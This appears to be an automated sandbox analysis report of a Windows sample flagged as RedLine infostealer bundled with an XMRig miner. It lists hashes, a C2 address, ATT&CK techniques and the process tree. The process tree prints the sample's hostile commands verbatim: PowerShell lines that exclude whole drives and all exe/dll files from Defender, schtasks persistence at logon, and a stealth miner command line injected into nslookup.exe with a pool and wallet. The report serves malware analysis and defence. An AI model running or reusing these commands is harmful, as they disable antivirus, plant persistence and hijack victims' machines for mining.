redline | a752e6646589c8b6f273ef47f91b8290ae41ed81ec2e18f56aa42aefaad1f47f

Analysis

max time kernel
149s
max time network
145s
platform
windows10_x64
resource
win10-en-20210920
submitted
26-10-2021 15:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Software updated by Dylox.exe
Size

3.2MB
MD5

6f78118b606c3c7c9bad1a9e0671cda8
SHA1

00abbc6a45d7009d8e166794289b39d0bb709ba5
SHA256

7be5baa4d9a45af1e6f15fdf6600537ed78e1694f9daa37741b5e8c3e58d7005
SHA512

77d474c0a67754e7f71ee1c932cd4f21bcbd1f94472ffd9c21cbe2c6242f5fa07f5fede82255b9037cff87fbde614225105db3b6a55be560dfc10ac74149d916

Score

10^/10

redline xmrig youtube discovery evasion infostealer miner spyware stealer themida trojan

Malware Config

Extracted

Family

redline

Botnet

Youtube

185.203.240.16:1249

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/760-140-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/760-141-0x0000000000418D32-mapping.dmp	family_redline

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

XMRig Miner Payload 2 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/3016-505-0x000000014030F3F8-mapping.dmp	xmrig
behavioral2/memory/3016-511-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig

Downloads MZ/PE file
Executes dropped EXE 8 IoCs

Processes:

Datafile32.exeDatafile64.exeServer32.exeServer32.exeservices32.exeservices64.exesihost32.exesihost64.exe

pid process

4044 Datafile32.exe
1016 Datafile64.exe
2196 Server32.exe
760 Server32.exe
3116 services32.exe
760 services64.exe
1512 sihost32.exe
2324 sihost64.exe

pid	process
4044	Datafile32.exe
1016	Datafile64.exe
2196	Server32.exe
760	Server32.exe
3116	services32.exe
760	services64.exe
1512	sihost32.exe
2324	sihost64.exe

Checks BIOS information in registry 2 TTPs 6 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Datafile64.exeservices64.exeSoftware updated by Dylox.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Datafile64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Datafile64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	services64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	services64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Software updated by Dylox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Software updated by Dylox.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 6 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral2/memory/2848-118-0x0000000001020000-0x0000000001021000-memory.dmp	themida
C:\Users\Admin\AppData\Local\Temp\Datafile64.exe	themida
C:\Users\Admin\AppData\Local\Temp\Datafile64.exe	themida
behavioral2/memory/1016-129-0x0000000000400000-0x0000000000EAE000-memory.dmp	themida
C:\Windows\System32\services64.exe	themida
C:\Windows\system32\services64.exe	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 3 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

Software updated by Dylox.exeDatafile64.exeservices64.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Software updated by Dylox.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Datafile64.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	services64.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in System32 directory 4 IoCs

Processes:

conhost.execonhost.exe

description	ioc	process
File created	C:\Windows\system32\services64.exe	conhost.exe
File opened for modification	C:\Windows\system32\services64.exe	conhost.exe
File created	C:\Windows\system32\Microsoft\Libs\sihost64.exe	conhost.exe
File created	C:\Windows\system32\Microsoft\Libs\WR64.sys	conhost.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

Processes:

Software updated by Dylox.exeDatafile64.exeservices64.exe

pid process

2848 Software updated by Dylox.exe
1016 Datafile64.exe
760 services64.exe

pid	process
2848	Software updated by Dylox.exe
1016	Datafile64.exe
760	services64.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

Server32.execonhost.exe

description	pid	process	target process
PID 2196 set thread context of 760	2196	Server32.exe	Server32.exe
PID 1504 set thread context of 3016	1504	conhost.exe	nslookup.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

3640 schtasks.exe
1932 schtasks.exe

pid	process
3640	schtasks.exe
1932	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

conhost.exepowershell.exepowershell.exeServer32.execonhost.exepowershell.exepowershell.execonhost.exepowershell.exepowershell.execonhost.exepowershell.exenslookup.exe

pid	process
1408	conhost.exe
1992	powershell.exe
1992	powershell.exe
1992	powershell.exe
3196	powershell.exe
3196	powershell.exe
3196	powershell.exe
760	Server32.exe
2132	conhost.exe
2416	powershell.exe
2416	powershell.exe
2416	powershell.exe
396	powershell.exe
396	powershell.exe
396	powershell.exe
2772	conhost.exe
2772	conhost.exe
3800	powershell.exe
3800	powershell.exe
3800	powershell.exe
1704	powershell.exe
1704	powershell.exe
1704	powershell.exe
1504	conhost.exe
1504	conhost.exe
1716	powershell.exe
1716	powershell.exe
1716	powershell.exe
3016	nslookup.exe
3016	nslookup.exe
3016	nslookup.exe
3016	nslookup.exe
3016	nslookup.exe
3016	nslookup.exe
3016	nslookup.exe
3016	nslookup.exe
3016	nslookup.exe
3016	nslookup.exe
3016	nslookup.exe
3016	nslookup.exe
3016	nslookup.exe
3016	nslookup.exe
3016	nslookup.exe
3016	nslookup.exe
3016	nslookup.exe
3016	nslookup.exe
3016	nslookup.exe
3016	nslookup.exe
3016	nslookup.exe
3016	nslookup.exe
3016	nslookup.exe
3016	nslookup.exe
3016	nslookup.exe
3016	nslookup.exe
3016	nslookup.exe
3016	nslookup.exe
3016	nslookup.exe
3016	nslookup.exe
3016	nslookup.exe
3016	nslookup.exe
3016	nslookup.exe
3016	nslookup.exe
3016	nslookup.exe
3016	nslookup.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Software updated by Dylox.execonhost.exepowershell.exepowershell.exeServer32.execonhost.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2848	Software updated by Dylox.exe
Token: SeDebugPrivilege	1408	conhost.exe
Token: SeDebugPrivilege	1992	powershell.exe
Token: SeIncreaseQuotaPrivilege	1992	powershell.exe
Token: SeSecurityPrivilege	1992	powershell.exe
Token: SeTakeOwnershipPrivilege	1992	powershell.exe
Token: SeLoadDriverPrivilege	1992	powershell.exe
Token: SeSystemProfilePrivilege	1992	powershell.exe
Token: SeSystemtimePrivilege	1992	powershell.exe
Token: SeProfSingleProcessPrivilege	1992	powershell.exe
Token: SeIncBasePriorityPrivilege	1992	powershell.exe
Token: SeCreatePagefilePrivilege	1992	powershell.exe
Token: SeBackupPrivilege	1992	powershell.exe
Token: SeRestorePrivilege	1992	powershell.exe
Token: SeShutdownPrivilege	1992	powershell.exe
Token: SeDebugPrivilege	1992	powershell.exe
Token: SeSystemEnvironmentPrivilege	1992	powershell.exe
Token: SeRemoteShutdownPrivilege	1992	powershell.exe
Token: SeUndockPrivilege	1992	powershell.exe
Token: SeManageVolumePrivilege	1992	powershell.exe
Token: 33	1992	powershell.exe
Token: 34	1992	powershell.exe
Token: 35	1992	powershell.exe
Token: 36	1992	powershell.exe
Token: SeDebugPrivilege	3196	powershell.exe
Token: SeDebugPrivilege	760	Server32.exe
Token: SeIncreaseQuotaPrivilege	3196	powershell.exe
Token: SeSecurityPrivilege	3196	powershell.exe
Token: SeTakeOwnershipPrivilege	3196	powershell.exe
Token: SeLoadDriverPrivilege	3196	powershell.exe
Token: SeSystemProfilePrivilege	3196	powershell.exe
Token: SeSystemtimePrivilege	3196	powershell.exe
Token: SeProfSingleProcessPrivilege	3196	powershell.exe
Token: SeIncBasePriorityPrivilege	3196	powershell.exe
Token: SeCreatePagefilePrivilege	3196	powershell.exe
Token: SeBackupPrivilege	3196	powershell.exe
Token: SeRestorePrivilege	3196	powershell.exe
Token: SeShutdownPrivilege	3196	powershell.exe
Token: SeDebugPrivilege	3196	powershell.exe
Token: SeSystemEnvironmentPrivilege	3196	powershell.exe
Token: SeRemoteShutdownPrivilege	3196	powershell.exe
Token: SeUndockPrivilege	3196	powershell.exe
Token: SeManageVolumePrivilege	3196	powershell.exe
Token: 33	3196	powershell.exe
Token: 34	3196	powershell.exe
Token: 35	3196	powershell.exe
Token: 36	3196	powershell.exe
Token: SeDebugPrivilege	2132	conhost.exe
Token: SeDebugPrivilege	2416	powershell.exe
Token: SeIncreaseQuotaPrivilege	2416	powershell.exe
Token: SeSecurityPrivilege	2416	powershell.exe
Token: SeTakeOwnershipPrivilege	2416	powershell.exe
Token: SeLoadDriverPrivilege	2416	powershell.exe
Token: SeSystemProfilePrivilege	2416	powershell.exe
Token: SeSystemtimePrivilege	2416	powershell.exe
Token: SeProfSingleProcessPrivilege	2416	powershell.exe
Token: SeIncBasePriorityPrivilege	2416	powershell.exe
Token: SeCreatePagefilePrivilege	2416	powershell.exe
Token: SeBackupPrivilege	2416	powershell.exe
Token: SeRestorePrivilege	2416	powershell.exe
Token: SeShutdownPrivilege	2416	powershell.exe
Token: SeDebugPrivilege	2416	powershell.exe
Token: SeSystemEnvironmentPrivilege	2416	powershell.exe
Token: SeRemoteShutdownPrivilege	2416	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Software updated by Dylox.exeServer32.exeDatafile32.execonhost.execmd.execmd.exeDatafile64.execonhost.execmd.execmd.execmd.execmd.exeservices32.execonhost.execmd.exesihost32.exeservices64.exe

description	pid	process	target process
PID 2848 wrote to memory of 4044	2848	Software updated by Dylox.exe	Datafile32.exe
PID 2848 wrote to memory of 4044	2848	Software updated by Dylox.exe	Datafile32.exe
PID 2848 wrote to memory of 1016	2848	Software updated by Dylox.exe	Datafile64.exe
PID 2848 wrote to memory of 1016	2848	Software updated by Dylox.exe	Datafile64.exe
PID 2848 wrote to memory of 2196	2848	Software updated by Dylox.exe	Server32.exe
PID 2848 wrote to memory of 2196	2848	Software updated by Dylox.exe	Server32.exe
PID 2848 wrote to memory of 2196	2848	Software updated by Dylox.exe	Server32.exe
PID 2196 wrote to memory of 760	2196	Server32.exe	Server32.exe
PID 2196 wrote to memory of 760	2196	Server32.exe	Server32.exe
PID 2196 wrote to memory of 760	2196	Server32.exe	Server32.exe
PID 2196 wrote to memory of 760	2196	Server32.exe	Server32.exe
PID 2196 wrote to memory of 760	2196	Server32.exe	Server32.exe
PID 2196 wrote to memory of 760	2196	Server32.exe	Server32.exe
PID 2196 wrote to memory of 760	2196	Server32.exe	Server32.exe
PID 2196 wrote to memory of 760	2196	Server32.exe	Server32.exe
PID 4044 wrote to memory of 1408	4044	Datafile32.exe	conhost.exe
PID 4044 wrote to memory of 1408	4044	Datafile32.exe	conhost.exe
PID 4044 wrote to memory of 1408	4044	Datafile32.exe	conhost.exe
PID 1408 wrote to memory of 1620	1408	conhost.exe	cmd.exe
PID 1408 wrote to memory of 1620	1408	conhost.exe	cmd.exe
PID 1620 wrote to memory of 1992	1620	cmd.exe	powershell.exe
PID 1620 wrote to memory of 1992	1620	cmd.exe	powershell.exe
PID 1408 wrote to memory of 3044	1408	conhost.exe	cmd.exe
PID 1408 wrote to memory of 3044	1408	conhost.exe	cmd.exe
PID 3044 wrote to memory of 3640	3044	cmd.exe	schtasks.exe
PID 3044 wrote to memory of 3640	3044	cmd.exe	schtasks.exe
PID 1620 wrote to memory of 3196	1620	cmd.exe	powershell.exe
PID 1620 wrote to memory of 3196	1620	cmd.exe	powershell.exe
PID 1016 wrote to memory of 2132	1016	Datafile64.exe	conhost.exe
PID 1016 wrote to memory of 2132	1016	Datafile64.exe	conhost.exe
PID 1016 wrote to memory of 2132	1016	Datafile64.exe	conhost.exe
PID 2132 wrote to memory of 3632	2132	conhost.exe	cmd.exe
PID 2132 wrote to memory of 3632	2132	conhost.exe	cmd.exe
PID 3632 wrote to memory of 2416	3632	cmd.exe	powershell.exe
PID 3632 wrote to memory of 2416	3632	cmd.exe	powershell.exe
PID 2132 wrote to memory of 1332	2132	conhost.exe	cmd.exe
PID 2132 wrote to memory of 1332	2132	conhost.exe	cmd.exe
PID 1332 wrote to memory of 1932	1332	cmd.exe	schtasks.exe
PID 1332 wrote to memory of 1932	1332	cmd.exe	schtasks.exe
PID 1408 wrote to memory of 3620	1408	conhost.exe	cmd.exe
PID 1408 wrote to memory of 3620	1408	conhost.exe	cmd.exe
PID 3620 wrote to memory of 3116	3620	cmd.exe	services32.exe
PID 3620 wrote to memory of 3116	3620	cmd.exe	services32.exe
PID 3632 wrote to memory of 396	3632	cmd.exe	powershell.exe
PID 3632 wrote to memory of 396	3632	cmd.exe	powershell.exe
PID 2132 wrote to memory of 1496	2132	conhost.exe	cmd.exe
PID 2132 wrote to memory of 1496	2132	conhost.exe	cmd.exe
PID 1496 wrote to memory of 760	1496	cmd.exe	services64.exe
PID 1496 wrote to memory of 760	1496	cmd.exe	services64.exe
PID 3116 wrote to memory of 2772	3116	services32.exe	conhost.exe
PID 3116 wrote to memory of 2772	3116	services32.exe	conhost.exe
PID 3116 wrote to memory of 2772	3116	services32.exe	conhost.exe
PID 2772 wrote to memory of 428	2772	conhost.exe	cmd.exe
PID 2772 wrote to memory of 428	2772	conhost.exe	cmd.exe
PID 428 wrote to memory of 3800	428	cmd.exe	powershell.exe
PID 428 wrote to memory of 3800	428	cmd.exe	powershell.exe
PID 2772 wrote to memory of 1512	2772	conhost.exe	sihost32.exe
PID 2772 wrote to memory of 1512	2772	conhost.exe	sihost32.exe
PID 428 wrote to memory of 1704	428	cmd.exe	powershell.exe
PID 428 wrote to memory of 1704	428	cmd.exe	powershell.exe
PID 1512 wrote to memory of 3112	1512	sihost32.exe	conhost.exe
PID 1512 wrote to memory of 3112	1512	sihost32.exe	conhost.exe
PID 1512 wrote to memory of 3112	1512	sihost32.exe	conhost.exe
PID 760 wrote to memory of 1504	760	services64.exe	conhost.exe

C:\Users\Admin\AppData\Local\Temp\Software updated by Dylox.exe
"C:\Users\Admin\AppData\Local\Temp\Software updated by Dylox.exe"
1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2848

C:\Users\Admin\AppData\Local\Temp\Datafile32.exe
"C:\Users\Admin\AppData\Local\Temp\Datafile32.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4044

C:\Windows\System32\conhost.exe
"C:\Windows\System32\\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Datafile32.exe"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1408

C:\Windows\System32\cmd.exe
"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
4⤵
- Suspicious use of WriteProcessMemory
PID:1620

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1992

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3196

C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\services32.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:3044

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\services32.exe"
5⤵
- Creates scheduled task(s)
PID:3640

C:\Windows\System32\cmd.exe
"cmd" cmd /c "C:\Users\Admin\services32.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:3620

C:\Users\Admin\services32.exe
C:\Users\Admin\services32.exe
5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3116

C:\Windows\System32\conhost.exe
"C:\Windows\System32\\conhost.exe" "C:\Users\Admin\services32.exe"
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2772

C:\Windows\System32\cmd.exe
"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
7⤵
- Suspicious use of WriteProcessMemory
PID:428

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:3800

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:1704

C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
7⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1512

C:\Windows\System32\conhost.exe
"C:\Windows\System32\\conhost.exe" "/sihost32"
8⤵
PID:3112

C:\Users\Admin\AppData\Local\Temp\Datafile64.exe
"C:\Users\Admin\AppData\Local\Temp\Datafile64.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:1016

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Datafile64.exe"
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2132

C:\Windows\System32\cmd.exe
"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
4⤵
- Suspicious use of WriteProcessMemory
PID:3632

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2416

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:396

C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:1332

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
5⤵
- Creates scheduled task(s)
PID:1932

C:\Windows\System32\cmd.exe
"cmd" cmd /c "C:\Windows\system32\services64.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:1496

C:\Windows\system32\services64.exe
C:\Windows\system32\services64.exe
5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:760

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"
6⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:1504

C:\Windows\System32\cmd.exe
"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
7⤵
PID:1788

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
8⤵
PID:1452

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:1716

C:\Windows\system32\Microsoft\Libs\sihost64.exe
"C:\Windows\system32\Microsoft\Libs\sihost64.exe"
7⤵
- Executes dropped EXE
PID:2324

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "/sihost64"
8⤵
PID:1344

C:\Windows\System32\nslookup.exe
C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=459jfEXyVheN7bBBRJPjJY7jH8nCKFZKdZrBcyPK6q4b7mQnrxN3sSmU8wAcuVvMxP6sumE9x28XSRCgLgyBvT4VENVJbTQ --pass= --cpu-max-threads-hint=50 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6NiP86mD8cW+f6jtmqjmEDLY00XM3Bo2fOksM1LJ6Dgf" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56GQTOYuXRCBeyb5NYlmdCuiwuvmEFRE3FUoytGa2xDRKVyTGVqBRZ3YvrseaWnYy0OhLuczKVxfo8Wo33kvDh26CIpmy6+bf50YCXxhpkDvay12RqWFwTrEWzJDjMOFSbV4qSudJZDKeejGmt2wAsK4zZ9lj0F0NMeagNs9oiluuddfhHuwfN3JDOsm7vnmpSFDvtwzZIXsZWyWN624JxJsSIqBQxfKrcCnHvRx/k2yLSlvxLvum+3cwztr7Zb0wO7EEWrafJMkNolCTGr1RQK9klv+u1q+LOMUOW+Y1mA+ZjeC+aSi9qmt59ZMlAX42foDzL1w8qyVjl6rfhEF/2bTP0YCyKockkTlSVngGY/1F1T5EOo9DhmrxyNy9y8mJqRKYUIcpgNI5Y4F/BBh3W0pw0+6w6pKB/o2s/ADQ0m7f1mIWwiXrj/GHg6M2kw4tg4mnBGVnha642JDqV8iaYphm4FpsNVwyEeLSXd18Mjr+kd9fvE08ohpB15bbg+6JPSeWISk8CHiep3TzEvyvZ+5XcHZVh1iXXZwlYO+wW5wxnobnzBzuj6f/BZ2txWK+7m4Cgd8mjMym7jJ/vKH1WIDSz05jpx4+wkdqzn3YIdvl2S8Luc4rG0CJXqJOdwbYOBrAey4VzJk8E8cY9tmMr5hpjLcfmu59CVDYVbbFFkb9usjHhXda167RDDOeCiLgdiepY0+9J4GWfDFBWRnvZEIn9njCW10s1hFXvQH+unnKdsaoBPNxSaPInK8O97Hj64jPqNG5qPd3DSjbVR1Cvuh9P29ZftnsNS50GnGtYvaNRBa6443D9MamN7WKSEjXwi5X466GHpLm7tClAm3T8zHW8BSKHq3yutkuduzGC2BYW5rxa17LYp4CzfKufpZJNPcoGIEVeut/xrvPPi+IYNCKrJPaDMN2ZJkpVGMqbuc5AF89xn8L6Lg1pYhaW8QjVZfQAkz7FVC8K667Gg6noLQpAyfd6lW36v4zbzg+fy82rNQmYSI3WMfiYNmvJM8DVc0772kBqEwUisr6ktdw4QlqXJe45Hvgu4yC2Rb6/ntnmOTLJz66c2h/wdUSvS18C67j6jsTvSh7k7avmCdG4sgS/BcyNsYOGIVjgNICoikSjNVrnFxCscaJerBnNPv197mrO4+rRF20+jzVnXKaNAmzbmoa4UjU13WSWasSDIT/HLOYsB6MqZ9V7F19H0MAEc0HL5dHX6oXKZkVMPa+PCA=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth
7⤵
- Suspicious behavior: EnumeratesProcesses
PID:3016

C:\Users\Admin\AppData\Local\Temp\Server32.exe
"C:\Users\Admin\AppData\Local\Temp\Server32.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2196

C:\Users\Admin\AppData\Local\Temp\Server32.exe
C:\Users\Admin\AppData\Local\Temp\Server32.exe
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:760

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
MD5
84f2160705ac9a032c002f966498ef74

SHA1
e9f3db2e1ad24a4f7e5c203af03bbc07235e704c

SHA256
7840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93

SHA512
f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Server32.exe.log
MD5
41fbed686f5700fc29aaccf83e8ba7fd

SHA1
5271bc29538f11e42a3b600c8dc727186e912456

SHA256
df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437

SHA512
234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
91f58c55452f07632f3747097335621b

SHA1
e30b2caebaf73e683dc4d2990ef87924580e1d52

SHA256
2e7e2d429b53606ef0eab9a5b8b6902019be497dbf0dd0bb63ed134408dbe727

SHA512
c61a0c1bb05e620e00260710b6bdf68db9358afea449424deed22050688a26c393c4a6c40117371f66c12bffd1a319919ebb7ee4c0d932b27d3f8253c87f3764

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
9d15151d47657c4f551820e55337c2da

SHA1
8aa655c0b87bbd3c5212816c3b402849a8d4284e

SHA256
dcf73bcb5a54efbba464e8fae8e6d9cb961a371e10f04c44ae28d4b5a6243656

SHA512
1ce44057ba13375e465377ad8c9881a854e7aadfaa7cbc365d06efdc8ef5674ba69f0a2a05fe2db829386ef6e54796d6676f5f99b61c849209e5f01ef598cb18

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
